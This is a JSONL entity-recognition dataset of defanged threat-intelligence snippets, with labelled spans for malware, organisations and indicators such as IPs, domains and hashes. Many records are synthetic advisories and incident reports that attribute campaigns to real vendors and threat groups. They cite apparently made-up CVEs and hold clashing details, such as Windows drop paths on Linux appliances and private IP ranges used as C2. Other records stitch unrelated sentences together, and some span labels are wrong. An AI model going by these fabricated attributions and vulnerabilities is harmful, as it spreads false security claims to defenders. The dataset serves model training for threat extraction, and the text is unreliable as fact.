{"text": "Huntress published a threat intelligence report linking Sandworm to a new campaign exploiting CVE-2023-14679 in Barracuda ESG. The attackers deployed RemcosRAT via Mimikatz, establishing C2 communication with 10[.]19[.]235[.]92 and data-sync[.]link. A secondary payload was downloaded from hxxp://apicache[.]site/assets/js/payload.js. The malware binary (SHA256: 4c4e44fcd78d0398702a76eac4c22b1a53e8ab4e069d654d46c2b017ea51d348) was dropped to /opt/app/bin/beacon.dll. Phishing emails were sent from security@credential-check[ . ]site targeting enterprise users. A backup C2 server was identified at 10[.]135[.]187[.]228.", "spans": {"Organization: Huntress": [[0, 8]], "Vulnerability: CVE-2023-14679": [[94, 108]], "System: Barracuda ESG": [[112, 125]], "Malware: RemcosRAT": [[150, 159]], "Indicator: 10.19.235.92": [[209, 227]], "Indicator: data-sync.link": [[232, 248]], "Indicator: hxxp://apicache.site/assets/js/payload.js": [[290, 333]], "Indicator: 4c4e44fcd78d0398702a76eac4c22b1a53e8ab4e069d654d46c2b017ea51d348": [[363, 427]], "Indicator: security@credential-check.site": [[500, 534]], "Indicator: 10.135.187.228": [[600, 620]]}, "info": {"id": "synth_v2_00185", "source": "defanged_augment"}}
{"text": "Phishing Campaign Report: Qualys identified a large-scale phishing operation. Emails originated from admin@document-share[ . ]link and support@phishing-domain[.]com, spoofing legitimate services. Victims were directed to hxxps://apilogin[ . ]net/download/update.exe which hosted a credential harvesting page on cdn-mail[.]club. A secondary link hxxps://logincloud[ . ]info/gate.php delivered Amadey (SHA1: 64498ff275059b14c4397d6156639c4357c8d188). The malware was saved to C:\\Windows\\Tasks\\beacon.dll and established C2 with 192 [ . ] 218 [ . ] 61 [ . ] 174.", "spans": {"Organization: Qualys": [[26, 32]], "Indicator: admin@document-share.link": [[101, 130]], "Indicator: support@phishing-domain.com": [[135, 164]], "Indicator: hxxps://apilogin.net/download/update.exe": [[221, 265]], "Indicator: cdn-mail.club": [[311, 326]], "Indicator: https://logincloud.info/gate.php": [[345, 381]], "Malware: Amadey": [[392, 398]], "Indicator: 64498ff275059b14c4397d6156639c4357c8d188": [[406, 446]], "Indicator: 192.218.61.174": [[526, 558]]}, "info": {"id": "synth_v2_01089", "source": "defanged_augment"}}
{"text": "Incident Response Summary: On detection of anomalous traffic to 118[.]196[.]93[.]179, the Huntress IR team identified BumbleBee running as C:\\Users\\Public\\Documents\\csrss.exe. The threat actor, believed to be Turla, used Mythic for credential harvesting and ADFind for lateral movement. Exfiltrated data was sent to sync-edge[.]info and cloud-proxy[ . ]site. The initial dropper (SHA1: b861d5012471cd92d1feafe9ceabd0e9ee389868) was delivered via a phishing email from ceo@identity-verify[ . ]cc. A second C2 node was observed at 172[.]22[.]122[.]227, with a persistence mechanism writing to C:\\ProgramData\\taskhost.exe.", "spans": {"Indicator: 118.196.93.179": [[64, 84]], "Organization: Huntress": [[90, 98]], "Malware: BumbleBee": [[118, 127]], "Indicator: sync-edge.info": [[316, 332]], "Indicator: cloud-proxy.site": [[337, 357]], "Indicator: b861d5012471cd92d1feafe9ceabd0e9ee389868": [[386, 426]], "Indicator: ceo@identity-verify.cc": [[468, 494]], "Indicator: 172.22.122.227": [[529, 549]]}, "info": {"id": "synth_v2_00313", "source": "defanged_augment"}}
{"text": "HummingBad sends notifications to Umeng , a tracking and analytics service attackers use to manage their campaign . The backdoors Lazarus are deploying are difficult to detect and a significant threat to the privacy and security of enterprises , allowing attackers to steal information , delete files , install malware , and more . APT33 : 64 [ . ] 251 [ . ] 19 [ . ] 217 [REDACTED][.]servehttp[.]com . Cuba ransomware was first observed in 2019 .", "spans": {"Malware: HummingBad": [[0, 10]], "Organization: enterprises": [[232, 243]], "Indicator: 64.251.19.217": [[340, 371]], "Indicator: [REDACTED].servehttp.com": [[372, 400]], "Malware: Cuba ransomware": [[403, 418]]}, "info": {"id": "cyberner_stix_train_007948", "source": "defanged_augment"}}
{"text": "This indicates that multiple C2 servers were used in this campaign , but one ( 37 [ . ] 1 [ . ] 207 [ . ] 31 ) was the most heavily used .", "spans": {"Indicator: 37.1.207.31": [[79, 108]]}, "info": {"id": "cyner_train_001156", "source": "defanged_augment"}}
{"text": "usv0503[.]iqservs-jp[.]com aux[.]robertstockdill[.]com fli[ . ]fedora-dns-update[ . ]com bss[.]pvtcdn[.]com ssl[ . ]microsoft-security-center[ . ]com ssl[ . ]2upgrades[ . ]com 133 [ . ] 242 [ . ] 134 [ . ] 121 fli[.]fedora-dns-update[.]com .", "spans": {"Indicator: usv0503.iqservs-jp.com": [[0, 26]], "Indicator: aux.robertstockdill.com": [[27, 54]], "Indicator: fli.fedora-dns-update.com": [[55, 88], [210, 239]], "Indicator: bss.pvtcdn.com": [[89, 107]], "Indicator: ssl.microsoft-security-center.com": [[108, 149]], "Indicator: ssl.2upgrades.com": [[150, 175]], "Indicator: 133.242.134.121": [[176, 209]]}, "info": {"id": "cyberner_stix_train_002009", "source": "defanged_augment"}}
{"text": "Malware Analysis Report: Emotet (SHA1: ceb1ac9c61fc1f73edc92b3548fbfde86a095eb8). Upon execution on Zyxel USG, the sample creates C:\\Windows\\System32\\implant.so and injects into legitimate processes. Network analysis shows beaconing to 172 [ . ] 196 [ . ] 156 [ . ] 8 every 60 seconds and DNS queries to apisecure[.]xyz. The second stage was fetched from hxxps://secureedge[.]xyz/api/v2/auth and written to /etc/cron.d/shell.php. The payload uses Rubeus-style techniques for defense evasion. A secondary hash (SHA256: 8d899cd4c6ad2d9d9e4ddb54adabf344d8d7f00d9d78b6f96036560bb4838295) was extracted from the unpacked payload.", "spans": {"Malware: Emotet": [[25, 31]], "Indicator: ceb1ac9c61fc1f73edc92b3548fbfde86a095eb8": [[39, 79]], "System: Zyxel USG": [[100, 109]], "Indicator: 172.196.156.8": [[236, 267]], "Indicator: apisecure.xyz": [[304, 319]], "Indicator: https://secureedge.xyz/api/v2/auth": [[355, 391]], "Indicator: 8d899cd4c6ad2d9d9e4ddb54adabf344d8d7f00d9d78b6f96036560bb4838295": [[518, 582]]}, "info": {"id": "synth_v2_00522", "source": "defanged_augment"}}
{"text": "While they still use RAR SFX format for the initial payloads , ZeroT now uses a the legitimate McAfee utility ( SHA256 3124fcb79da0bdf9d0d1995e37b06f7929d83c1c4b60e38c104743be71170efe ) named mcut[.]exe instead of the Norman Safeground AS for sideloading as they have in the past .", "spans": {"Malware: ZeroT": [[63, 68]], "Organization: McAfee": [[95, 101]], "Indicator: 3124fcb79da0bdf9d0d1995e37b06f7929d83c1c4b60e38c104743be71170efe": [[119, 183]], "Indicator: mcut.exe": [[192, 202]], "Organization: Norman Safeground AS": [[218, 238]]}, "info": {"id": "cyberner_stix_train_007018", "source": "defanged_augment"}}
{"text": "CTU researchers conclude that COBALT GYPSY created the persona to gain unauthorized access to targeted computer networks via social engineering . However , Kaspersky Security Network (KSN) records also contain links that victims clicked from the Outlook web client outlook[ . ]live[ . ]com” as well as attachments arriving through the Outlook desktop application .", "spans": {"Organization: CTU": [[0, 3]], "Organization: social engineering": [[125, 143]], "Organization: Kaspersky": [[156, 165]], "Indicator: outlook.live.com”": [[265, 290]]}, "info": {"id": "cyberner_stix_train_005162", "source": "defanged_augment"}}
{"text": "Forensic Investigation Notes: Analysis of the compromised host revealed Brute Ratel artifacts at /usr/local/bin/loader.exe. Memory dump analysis confirmed execution of Mimikatz. Registry modifications pointed to persistence via /home/user/.config/agent.py. Network forensics identified connections to 105 [ . ] 60 [ . ] 35 [ . ] 252 and data-cdn[.]link. Email headers traced the initial vector to contact@auth-check[.]org. File /dev/shm/implant.so (SHA256: 0e5e9d9bcd63d9d4d87a3ae4af3f60e27728aae3c479f49f9234779f6a93fad9) was identified as the initial dropper. A staging URL hxxps://nodeupdate[.]live/wp-content/uploads/doc.php resolved to 105[.]205[.]69[.]181. Secondary artifact hash: MD5: c31d5928c73089c7bb35e241f3d7afe1.", "spans": {"Indicator: 105.60.35.252": [[301, 332]], "Indicator: data-cdn.link": [[337, 352]], "Indicator: contact@auth-check.org": [[397, 421]], "Indicator: 0e5e9d9bcd63d9d4d87a3ae4af3f60e27728aae3c479f49f9234779f6a93fad9": [[457, 521]], "Indicator: https://nodeupdate.live/wp-content/uploads/doc.php": [[576, 628]], "Indicator: 105.205.69.181": [[641, 661]], "Indicator: c31d5928c73089c7bb35e241f3d7afe1": [[693, 725]]}, "info": {"id": "synth_v2_01283", "source": "defanged_augment"}}
{"text": "Vulnerability Advisory: CVE-2025-49086 is a critical race condition affecting Apache Struts. Trend Micro confirmed active exploitation by Storm-0558 in the wild. Exploitation delivers Hive (MD5: 5995e7914920a0d6afd0bc6850bc7517) which is dropped to C:\\Users\\admin\\Desktop\\csrss.exe. The exploit payload is hosted at hxxps://cacherelay[.]dev/api/v2/auth and communicates to 128 [ . ] 205 [ . ] 152 [ . ] 147 for C2.", "spans": {"Vulnerability: CVE-2025-49086": [[24, 38]], "Vulnerability: race condition": [[53, 67]], "System: Apache Struts": [[78, 91]], "Organization: Trend Micro": [[93, 104]], "Malware: Hive": [[184, 188]], "Indicator: 5995e7914920a0d6afd0bc6850bc7517": [[195, 227]], "Indicator: https://cacherelay.dev/api/v2/auth": [[316, 352]], "Indicator: 128.205.152.147": [[373, 406]]}, "info": {"id": "synth_v2_00845", "source": "defanged_augment"}}
{"text": "A backdoor also known as: Troj.W32.Buzus.kZ4S BKDR_PHDET.SMI Win32.Trojan.WisdomEyes.16070401.9500.9959 BKDR_PHDET.SMI Trojan[ . ]Win32[ . ]A[ . ]Downloader[ . ]34304[ . ]CO BackDoor.Dax BehavesLike.Win32.FDoSBEnergy.nt W32.Trojan.Trojan-downloader.Ge Backdoor:Win32/Phdet.B", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: Trojan.Win32.A.Downloader.34304.CO": [[119, 173]]}, "info": {"id": "cyner2_train_005886", "source": "defanged_augment"}}
{"text": "From early 2014 until December 2018 , ns0.idm.net.lb pointed to 194[.]126[.]10[.]18 , which appropriately enough is an Internet address based in Lebanon .", "spans": {"Indicator: 194.126.10.18": [[64, 83]]}, "info": {"id": "dnrti_train_001962", "source": "defanged_augment"}}
{"text": "Definition of populateConfigMap , which loads the map with values Correlating the last two steps , one can observe that the malware payload receives the configuration for the following properties : number – The default number to be send to the server ( in case the number is not available from the device ) api – The API key url – The URL to be used in WebView to display on the ransom note The malware saves this configuration to the shared preferences of the app data and then it sets up all the Broadcast Receivers . There are many articles and researches online about APT15 and their activities , the most recent one by NCC Group . WinZip version 11.2 and 24.0, and the built-in unzIP S-TOOL tool in Windows , recognized that the attachment SHIPPING_MX00034900_PL_INV_pdf[ . ]zip is an invalid . The threat actor first detected towards the end of last year when it attacked at least 87 organizations around the world in two months ' time .", "spans": {"Organization: NCC Group": [[624, 633]], "System: Windows": [[704, 711]], "Indicator: SHIPPING_MX00034900_PL_INV_pdf.zip": [[745, 783]]}, "info": {"id": "cyberner_stix_train_002704", "source": "defanged_augment"}}
{"text": "Vulnerability Advisory: CVE-2021-34898 is a critical deserialization flaw affecting Ubuntu 22.04. INTERPOL confirmed active exploitation by OilRig in the wild. Exploitation delivers IcedID (SHA1: 5784d45f69a6909b1226dd4ff004916d811ace43) which is dropped to C:\\Windows\\Tasks\\update.dll. The exploit payload is hosted at hxxps://login-static[ . ]online/panel/index.html and communicates to 36 [ . ] 223 [ . ] 136 [ . ] 46 for C2.", "spans": {"Vulnerability: CVE-2021-34898": [[24, 38]], "Vulnerability: deserialization flaw": [[53, 73]], "System: Ubuntu 22.04": [[84, 96]], "Organization: INTERPOL": [[98, 106]], "Malware: IcedID": [[182, 188]], "Indicator: 5784d45f69a6909b1226dd4ff004916d811ace43": [[196, 236]], "Indicator: https://login-static.online/panel/index.html": [[320, 368]], "Indicator: 36.223.136.46": [[389, 420]]}, "info": {"id": "synth_v2_00779", "source": "defanged_augment"}}
{"text": "Vulnerability Advisory: CVE-2020-15697 is a critical deserialization flaw affecting Atlassian Confluence. Mandiant confirmed active exploitation by OilRig in the wild. Exploitation delivers XLoader (MD5: 15bbda24e4f35d8380cbda63998a30e5) which is dropped to C:\\Users\\admin\\Downloads\\sam.hive. The exploit payload is hosted at hxxp://proxy-cloud[ . ]com/portal/verify and communicates to 172[.]125[.]180[.]81 for C2.", "spans": {"Vulnerability: CVE-2020-15697": [[24, 38]], "Vulnerability: deserialization flaw": [[53, 73]], "System: Atlassian Confluence": [[84, 104]], "Organization: Mandiant": [[106, 114]], "Malware: XLoader": [[190, 197]], "Indicator: 15bbda24e4f35d8380cbda63998a30e5": [[204, 236]], "Indicator: http://proxy-cloud.com/portal/verify": [[326, 366]], "Indicator: 172.125.180.81": [[387, 407]]}, "info": {"id": "synth_v2_00846", "source": "defanged_augment"}}
{"text": "IOC Bulletin - PikaBot Campaign:\nNetwork Indicators:\n- 172[.]32[.]117[.]91\n- 173 [ . ] 226 [ . ] 163 [ . ] 225\n- 10[.]36[.]82[.]113\n- cachegateway[ . ]xyz\n- cloudapi[.]net\nURLs:\n- hxxps://data-auth[.]dev/panel/index.html\n- hxxp://securedata[.]com/assets/js/payload.js\nEmail Senders:\n- ceo@document-share[.]link\n- hr@phishing-domain[ . ]com\nFile Indicators:\n- MD5: 7689dbff6ea326d45b4274538f6aa027\n- SHA1: 9a6fd1b12dce59812cc6359974b847ca60068dfc\n- Drop path: C:\\Windows\\Temp\\helper.sh", "spans": {"Malware: PikaBot": [[15, 22]], "Indicator: 172.32.117.91": [[55, 74]], "Indicator: 173.226.163.225": [[77, 110]], "Indicator: 10.36.82.113": [[113, 131]], "Indicator: cachegateway.xyz": [[134, 154]], "Indicator: cloudapi.net": [[157, 171]], "Indicator: hxxps://data-auth.dev/panel/index.html": [[180, 220]], "Indicator: http://securedata.com/assets/js/payload.js": [[223, 267]], "Indicator: ceo@document-share.link": [[285, 310]], "Indicator: hr@phishing-domain.com": [[313, 339]], "Indicator: 7689dbff6ea326d45b4274538f6aa027": [[364, 396]], "Indicator: 9a6fd1b12dce59812cc6359974b847ca60068dfc": [[405, 445]]}, "info": {"id": "synth_v2_01391", "source": "defanged_augment"}}
{"text": "Vulnerability in the Oracle BI Publisher product of Oracle Fusion Middleware (component: Web Server). Supported versions that are affected are 5[.]5[.]0[.]0.0, 11 [ . ] 1 [ . ] 1 [ . ] 9.0, 12 [ . ] 2 [ . ] 1 [ . ] 3.0 and 12[.]2[.]1[.]4.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle BI Publisher. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle BI Publisher, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle BI Publisher accessible data as well as unauthorized update, insert or delete access to some of Oracle BI Publisher accessible data. CVSS 3.1 Base Score 7.6 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N).", "spans": {"Indicator: 5.5.0.0": [[143, 156]], "Indicator: 11.1.1.9": [[160, 186]], "Indicator: 12.2.1.3": [[190, 216]], "Indicator: 12.2.1.4": [[223, 237]], "Organization: Oracle": [[21, 27], [52, 58], [348, 354], [486, 492], [679, 685], [782, 788]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2021-2062"}}
{"text": "Vulnerability Advisory: CVE-2022-14558 is a critical cross-site scripting affecting Fortinet FortiGate. Huntress confirmed active exploitation by Kimsuky in the wild. Exploitation delivers Qbot (SHA1: 757465a40f1e173f565f97b98608229218862958) which is dropped to /dev/shm/ntds.dit. The exploit payload is hosted at hxxp://nodeedge[ . ]org/collect and communicates to 172 [ . ] 174 [ . ] 182 [ . ] 14 for C2.", "spans": {"Vulnerability: CVE-2022-14558": [[24, 38]], "Vulnerability: cross-site scripting": [[53, 73]], "System: Fortinet FortiGate": [[84, 102]], "Organization: Huntress": [[104, 112]], "Malware: Qbot": [[189, 193]], "Indicator: 757465a40f1e173f565f97b98608229218862958": [[201, 241]], "Indicator: http://nodeedge.org/collect": [[315, 346]], "Indicator: 172.174.182.14": [[367, 399]]}, "info": {"id": "synth_v2_00665", "source": "defanged_augment"}}
{"text": "Forensic Investigation Notes: Analysis of the compromised host revealed Metasploit artifacts at /tmp/agent.py. Memory dump analysis confirmed execution of Chisel. Registry modifications pointed to persistence via /var/tmp/ntds.dit. Network forensics identified connections to 205 [ . ] 89 [ . ] 72 [ . ] 186 and databackup[ . ]live. Email headers traced the initial vector to billing@auth-check[.]org. File /dev/shm/beacon.dll (SHA256: 59dbbb67daba322fb1ea439f819be2a6fa600b7fbd413315eb79b740525aab40) was identified as the initial dropper. A staging URL hxxps://relayauth[.]com/api/v2/auth resolved to 192 [ . ] 136 [ . ] 27 [ . ] 125. Secondary artifact hash: MD5: f435621b2eb843ae45737f81868806a1.", "spans": {"Indicator: 205.89.72.186": [[276, 307]], "Indicator: databackup.live": [[312, 331]], "Indicator: billing@auth-check.org": [[376, 400]], "Indicator: 59dbbb67daba322fb1ea439f819be2a6fa600b7fbd413315eb79b740525aab40": [[436, 500]], "Indicator: hxxps://relayauth.com/api/v2/auth": [[555, 590]], "Indicator: 192.136.27.125": [[603, 635]], "Indicator: f435621b2eb843ae45737f81868806a1": [[667, 699]]}, "info": {"id": "synth_v2_01175", "source": "defanged_augment"}}
{"text": "Malware Analysis Report: TrickBot (SHA1: ba625661ea87ee5c4f15c2ed8bb29001a323fafe). Upon execution on Fortinet FortiGate, the sample creates /etc/cron.d/helper.sh and injects into legitimate processes. Network analysis shows beaconing to 73 [ . ] 198 [ . ] 230 [ . ] 234 every 60 seconds and DNS queries to proxy-static[ . ]info. The second stage was fetched from hxxp://relayproxy[ . ]dev/gate.php and written to C:\\Windows\\System32\\agent.py. The payload uses Sharphound-style techniques for defense evasion. A secondary hash (MD5: 85a8eab5038058e64f2007b85e753a44) was extracted from the unpacked payload.", "spans": {"Malware: TrickBot": [[25, 33]], "Indicator: ba625661ea87ee5c4f15c2ed8bb29001a323fafe": [[41, 81]], "System: Fortinet FortiGate": [[102, 120]], "Indicator: 73.198.230.234": [[238, 270]], "Indicator: proxy-static.info": [[307, 328]], "Indicator: hxxp://relayproxy.dev/gate.php": [[364, 398]], "Indicator: 85a8eab5038058e64f2007b85e753a44": [[533, 565]]}, "info": {"id": "synth_v2_00535", "source": "defanged_augment"}}
{"text": "Vulnerability Advisory: CVE-2025-27219 is a critical authentication bypass affecting Microsoft Exchange. SentinelOne confirmed active exploitation by Midnight Blizzard in the wild. Exploitation delivers DanaBot (SHA1: 8a9c3162c0893621ea1c6dc148cd1356a9a1b53c) which is dropped to C:\\Users\\admin\\AppData\\Local\\Temp\\svchost.exe. The exploit payload is hosted at hxxps://portalportal[ . ]club/admin/config and communicates to 192 [ . ] 137 [ . ] 15 [ . ] 170 for C2.", "spans": {"Vulnerability: CVE-2025-27219": [[24, 38]], "Vulnerability: authentication bypass": [[53, 74]], "System: Microsoft Exchange": [[85, 103]], "Organization: SentinelOne": [[105, 116]], "Malware: DanaBot": [[203, 210]], "Indicator: 8a9c3162c0893621ea1c6dc148cd1356a9a1b53c": [[218, 258]], "Indicator: https://portalportal.club/admin/config": [[360, 402]], "Indicator: 192.137.15.170": [[423, 455]]}, "info": {"id": "synth_v2_00692", "source": "defanged_augment"}}
{"text": "Moreover , we retrieved his University ID ; a quick googling showed some of his exam grades . The malware was initially distributed through a compromised software update system and then self-propagated through stolen credentials and SMB exploits , including the EternalBlue exploit used in the WannaCry attack from May 2017 . jams481[.]site[.]bz .", "spans": {"Malware: malware": [[98, 105]], "Indicator: jams481.site.bz": [[326, 345]]}, "info": {"id": "cyberner_stix_train_004348", "source": "defanged_augment"}}
{"text": "Phishing Campaign Report: Zscaler ThreatLabz identified a large-scale phishing operation. Emails originated from admin@credential-check[.]site and noreply@credential-check[ . ]site, spoofing legitimate services. Victims were directed to hxxp://data-relay[ . ]net/api/v2/auth which hosted a credential harvesting page on loginlogin[.]dev. A secondary link hxxps://updateedge[ . ]club/collect delivered Hive (SHA1: a98a1432984b12d124a1cba9a828099114e2e95f). The malware was saved to C:\\Users\\admin\\Desktop\\backdoor.elf and established C2 with 126[.]61[.]101[.]125.", "spans": {"Organization: Zscaler ThreatLabz": [[26, 44]], "Indicator: admin@credential-check.site": [[113, 142]], "Indicator: noreply@credential-check.site": [[147, 180]], "Indicator: http://data-relay.net/api/v2/auth": [[237, 274]], "Indicator: loginlogin.dev": [[320, 336]], "Indicator: hxxps://updateedge.club/collect": [[355, 390]], "Malware: Hive": [[401, 405]], "Indicator: a98a1432984b12d124a1cba9a828099114e2e95f": [[413, 453]], "Indicator: 126.61.101.125": [[541, 561]]}, "info": {"id": "synth_v2_00928", "source": "defanged_augment"}}
{"text": "Vulnerability Advisory: CVE-2024-23826 is a critical integer overflow affecting Apache Struts. Dragos confirmed active exploitation by Kimsuky in the wild. Exploitation delivers Cobalt Strike (SHA1: 30181c4b5819692cfe8d4538d90a597897e1a1b7) which is dropped to C:\\Users\\admin\\AppData\\Local\\Temp\\taskhost.exe. The exploit payload is hosted at hxxp://login-sync[ . ]online/login and communicates to 10[.]128[.]245[.]216 for C2.", "spans": {"Vulnerability: CVE-2024-23826": [[24, 38]], "Vulnerability: integer overflow": [[53, 69]], "System: Apache Struts": [[80, 93]], "Organization: Dragos": [[95, 101]], "Malware: Cobalt Strike": [[178, 191]], "Indicator: 30181c4b5819692cfe8d4538d90a597897e1a1b7": [[199, 239]], "Indicator: http://login-sync.online/login": [[342, 376]], "Indicator: 10.128.245.216": [[397, 417]]}, "info": {"id": "synth_v2_00726", "source": "defanged_augment"}}
{"text": "* Dec 22 - [[Group-IB] Anunak: APT against financial institutions](hxxp://www[ . ]group-ib[ . ]com/files/Anunak_APT_against_financial_institutions.pdf) | :closed_book:\n* Dec 21 - [[ThreatConnect] Operation Poisoned Helmand](hxxp://www[ . ]threatconnect[ . ]com/news/operation-poisoned-helmand/) | :closed_book:\n* Dec 19 - [[US-CERT] TA14-353A: Targeted Destructive Malware (wiper)](hxxps://www[ . ]us-cert[ . ]gov/ncas/alerts/TA14-353A) | :closed_book:\n* Dec 18 - [[Citizen Lab] Malware Attack Targeting Syrian ISIS Critics](hxxps://citizenlab[ . ]org/2014/12/malware-attack-targeting-syrian-isis-critics/) | :closed_book:\n* Dec 17 - [[CISCO] Wiper Malware – A Detection Deep Dive](hxxp://blogs[ . ]cisco[ . ]com/security/talos/wiper-malware) | :closed_book:\n* Dec 12 - [[Fidelis] Bots, Machines, and the Matrix](hxxp://www[.]fidelissecurity[.]com/sites/default/files/FTA_1014_Bots_Machines_and_the_Matrix.pdf) | :closed_book:\n* Dec 12 - [[AirBus] Vinself now with steganography](hxxp://blog[ . ]cybersecurity-airbusds[ . ]com/post/2014/12/Vinself) | :closed_book:\n* Dec 10 - [[Ahnlab] South Korea MBR Wiper](hxxp://asec[ . ]ahnlab[ . ]com/1015) | :closed_book:\n* Dec 10 - [[F-Secure] W64/Regin, Stage #1](hxxps://www[.]f-secure[.]com/documents/996508/1030745/w64_regin_stage_1.pdf) | :closed_book:\n* Dec 10 - [[F-Secure] W32/Regin, Stage #1](hxxps://www[.]f-secure[.]com/documents/996508/1030745/w32_regin_stage_1.pdf) | :closed_book:\n* Dec 10 - [[Kaspersky] Cloud Atlas: RedOctober APT](hxxp://securelist[.]com/blog/research/68083/cloud-atlas-redoctober-apt-is-back-in-style/) | :closed_book:\n* Dec 09 - [[BlueCoat] The Inception Framework](hxxps://www[ . ]bluecoat[ . ]com/security-blog/2014-12-09/blue-coat-exposes-%E2%80%9C-inception-framework%E2%80%9D-very-sophisticated-layered-malware) | :closed_book:\n* Dec 08 - [[Kaspersky] The 'Penquin' Turla](hxxp://securelist[.]com/blog/research/67962/the-penquin-turla-2/) | :closed_book:\n* Dec 05 - [[Cylance] Operation Cleaver: The Notepad Files](hxxp://blog[.]cylance[.]com/operation-cleaver-the-notepad-files) | :closed_book:\n* Dec 02 - [[Cylance] Operation Cleaver](hxxp://cdn2[.]hubspot[.]net/hubfs/270968/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf) | IOCs  | [:closed_book:](../../blob/ma", "spans": {"Indicator: http://www.group-ib.com/files/Anunak_APT_against_financial_institutions.pdf": [[67, 150]], "Indicator: http://www.threatconnect.com/news/operation-poisoned-helmand/": [[224, 293]], "Indicator: https://www.us-cert.gov/ncas/alerts/TA14-353A": [[382, 435]], "Indicator: https://citizenlab.org/2014/12/malware-attack-targeting-syrian-isis-critics/": [[525, 605]], "Indicator: http://blogs.cisco.com/security/talos/wiper-malware": [[682, 741]], "Indicator: http://www.fidelissecurity.com/sites/default/files/FTA_1014_Bots_Machines_and_the_Matrix.pdf": [[813, 909]], "Indicator: http://blog.cybersecurity-airbusds.com/post/2014/12/Vinself": [[980, 1047]], "Indicator: http://asec.ahnlab.com/1015": [[1109, 1144]], "Indicator: https://www.f-secure.com/documents/996508/1030745/w64_regin_stage_1.pdf": [[1206, 1281]], "Indicator: https://www.f-secure.com/documents/996508/1030745/w32_regin_stage_1.pdf": [[1343, 1418]], "Indicator: http://securelist.com/blog/research/68083/cloud-atlas-redoctober-apt-is-back-in-style/": [[1489, 1577]], "Indicator: https://www.bluecoat.com/security-blog/2014-12-09/blue-coat-exposes-%E2%80%9C-inception-framework%E2%80%9D-very-sophisticated-layered-malware": [[1643, 1792]], "Indicator: http://securelist.com/blog/research/67962/the-penquin-turla-2/": [[1855, 1919]], "Indicator: http://blog.cylance.com/operation-cleaver-the-notepad-files": [[1997, 2060]], "Indicator: http://cdn2.hubspot.net/hubfs/270968/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf": [[2119, 2211]], "Organization: Group-IB": [[13, 21]], "Organization: US-CERT": [[324, 331]], "Organization: F-Secure": [[1175, 1183], [1312, 1320]], "Organization: ThreatConnect": [[181, 194]], "Organization: Citizen Lab": [[466, 477]], "Malware: Regin": [[1189, 1194], [1326, 1331]], "Malware: Wiper": [[643, 648], [1102, 1107]], "Malware: Penquin": [[1839, 1846]], "Organization: Kaspersky": [[1449, 1458], [1823, 1832]]}, "info": {"source": "defanged_augment", "name": "2014"}}
{"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncgroup: split cgroup_destroy_wq into 3 workqueues\n\nA hung task can occur during [1] LTP cgroup testing when repeatedly\nmounting/unmounting perf_event and net_prio controllers with\nsystemd.unified_cgroup_hierarchy=1. The hang manifests in\ncgroup_lock_and_drain_offline() during root destruction.\n\nRelated case:\ncgroup_fj_function_perf_event cgroup_fj_function.sh perf_event\ncgroup_fj_function_net_prio cgroup_fj_function.sh net_prio\n\nCall Trace:\n\tcgroup_lock_and_drain_offline+0x14c/0x1e8\n\tcgroup_destroy_root+0x3c/0x2c0\n\tcss_free_rwork_fn+0x248/0x338\n\tprocess_one_work+0x16c/0x3b8\n\tworker_thread+0x22c/0x3b0\n\tkthread+0xec/0x100\n\tret_from_fork+0x10/0x20\n\nRoot Cause:\n\nCPU0                            CPU1\nmount perf_event                umount net_prio\ncgroup1_get_tree                cgroup_kill_sb\nrebind_subsystems               // root destruction enqueues\n\t\t\t\t// cgroup_destroy_wq\n// kill all perf_event css\n                                // one perf_event css A is dying\n                                // css A offline enqueues cgroup_destroy_wq\n                                // root destruction will be executed first\n                                css_free_rwork_fn\n                                cgroup_destroy_root\n                                cgroup_lock_and_drain_offline\n                                // some perf descendants are dying\n                                // cgroup_destroy_wq max_active = 1\n                                // waiting for css A to die\n\nProblem scenario:\n1. CPU0 mounts perf_event (rebind_subsystems)\n2. CPU1 unmounts net_prio (cgroup_kill_sb), queuing root destruction work\n3. A dying perf_event CSS gets queued for offline after root destruction\n4. Root destruction waits for offline completion, but offline work is\n   blocked behind root destruction in cgroup_destroy_wq (max_active=1)\n\nSolution:\nSplit cgroup_destroy_wq into three dedicated workqueues:\ncgroup_offline_wq – Handles CSS offline operations\ncgroup_release_wq – Manages resource release\ncgroup_free_wq – Performs final memory deallocation\n\nThis separation eliminates blocking in the CSS free path while waiting for\noffline operations to complete.\n\n[1] hxxps://github[ . ]com/linux-test-project/ltp/blob/master/runtest/controllers", "spans": {"Indicator: https://github.com/linux-test-project/ltp/blob/master/runtest/controllers": [[2238, 2315]], "System: Linux kernel": [[7, 19]], "System: systemd": [[249, 256]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2025-39953"}}
{"text": "IOC Bulletin - AgentTesla Campaign:\nNetwork Indicators:\n- 192 [ . ] 103 [ . ] 109 [ . ] 124\n- 192[.]241[.]183[.]221\n- 169 [ . ] 251 [ . ] 63 [ . ] 169\n- cdn-login[.]site\n- portalsync[.]top\nURLs:\n- hxxp://authapi[ . ]tech/assets/js/payload.js\n- hxxps://node-relay[.]com/api/v2/auth\nEmail Senders:\n- admin@credential-check[ . ]site\n- notification@secure-verify[.]net\nFile Indicators:\n- MD5: eefc702db8e948bce4d4e3014752f0d3\n- SHA1: 3fb7e472b58fe46ee3ed0a995261d00d65e7628a\n- Drop path: C:\\Users\\Public\\Documents\\ntds.dit", "spans": {"Malware: AgentTesla": [[15, 25]], "Indicator: 192.103.109.124": [[58, 91]], "Indicator: 192.241.183.221": [[94, 115]], "Indicator: 169.251.63.169": [[118, 150]], "Indicator: cdn-login.site": [[153, 169]], "Indicator: portalsync.top": [[172, 188]], "Indicator: hxxp://authapi.tech/assets/js/payload.js": [[197, 241]], "Indicator: https://node-relay.com/api/v2/auth": [[244, 280]], "Indicator: admin@credential-check.site": [[298, 329]], "Indicator: notification@secure-verify.net": [[332, 364]], "Indicator: eefc702db8e948bce4d4e3014752f0d3": [[389, 421]], "Indicator: 3fb7e472b58fe46ee3ed0a995261d00d65e7628a": [[430, 470]]}, "info": {"id": "synth_v2_01310", "source": "defanged_augment"}}
